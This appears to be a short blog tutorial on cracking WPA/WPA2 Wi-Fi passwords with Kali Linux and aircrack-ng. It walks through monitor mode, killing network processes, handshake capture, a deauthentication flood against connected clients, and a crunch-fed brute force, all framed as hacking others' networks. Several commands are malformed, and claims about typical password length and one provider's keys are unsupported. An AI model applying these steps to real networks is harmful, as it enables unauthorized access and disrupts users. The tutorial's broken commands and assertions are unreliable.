HOW TO HACK WPA/WPA2 USING KALI LINUX*
Today i Show you how to hack Wi-Fi.
• *REQUIREMENTS* •
- Kali Linux
Tool:
> Aircrack-ng
*[ NOTE ]:* for every command i use ">".
First we Open Terminal.
1) type
> airmon
(to see your wlan list)
2) type
> airmon start wlan0
(wlan0 is default)
3) Now it shows the prozessor id's.
Type
> kill 523 (NetworkManager)
> kill 657
(dhclient)
> kill 894 (wpa_supplicant)
4) type
airodump-ng wlan0mon
5) now you see a list.
You need :
BSSID
CH
ESSID
type
> airodump-ng --bssid "your Basis" -c "your CH" -w Hacktest wlan0mon
6) Open new Terminal
Type
> aireplay-ng -0 -50 -a "your bssid" -c "your Station" wlan0mon
7) now you have a new file on your /root. (called Hacktest.cap)
Now type in your first console
> crunch 16 16 0123456789 | aircrack-ng -b "bssid" -w Hacktest.cap
( crunch "min" "max" "characters" | aircrack-ng -b "bssid" -w "your cap file")
( most passwords are 16 long.) try it with that.
(Telekom use only numbers.)
8) Now it will be cracking passwords.
Wait.
Post a Comment